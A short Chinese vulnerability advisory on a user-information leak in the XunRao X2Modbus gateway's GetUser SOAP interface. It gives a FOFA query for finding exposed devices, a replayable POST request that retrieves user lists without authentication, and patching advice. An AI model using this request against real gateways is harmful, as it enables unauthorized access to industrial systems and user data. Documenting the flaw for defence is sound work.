迅饶科技X2Modbus网关-GetUser信息泄露漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

该漏洞的存在是由于'GetUser'接口在处理SOAP请求时,缺乏对请求的充分验证和授权检查,任何人都可以通过发送特定的SOAP请求,获取系统中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP请求,绕过身份验证机制,直接获取用户数据。

漏洞再现

FOFA:server="SunFull-Webs"

http://ip:898/login.html页面抓包,在重放器使用下面的格式

POST /soap/GetUserList

HTTP/1.1 ip

Cookie: language=zh-cn; language=zh-cn; username=admin

Content-Length: 12

Connection: close

{"CmpWc":""}

修复建议

对 GetUser 接口的输入进行严格的验证和过滤。确保输入的用户名和密码符合预期的格式和长度,防止恶意用户通过构造特殊字符或语句来获取信息。

定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并及时应用到系统中。厂商通常会修复已知的漏洞,通过更新补丁可以有效地防止攻击者利用这些漏洞进行信息泄露攻击。

相关推荐
迷路的小绅士1 小时前
计算机网络核心知识点全解析(面试通关版)
计算机网络·面试·职场和发展
琢磨先生David2 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
20242817李臻4 小时前
李臻20242817_安全文件传输系统项目报告_第9周
数据库·安全
奋斗者1号4 小时前
《Crawl4AI 爬虫工具部署配置全攻略》
网络·爬虫
智驱力人工智能5 小时前
无感通行与精准管控:AI单元楼安全方案的技术融合实践
人工智能·安全·智慧城市·智慧园区
courniche5 小时前
VRRP与BFD在冗余设计中的核心区别:从“备用网关”到“毫秒级故障检测”
网络·智能路由器
艾厶烤的鱼5 小时前
架构-信息安全技术基础知识
网络·架构
见青..5 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
muxue1786 小时前
centos 7 网络配置(2):ping命令出现问题
linux·网络·centos
丰锋ff7 小时前
计算机网络学习笔记 4-6章
计算机网络·考研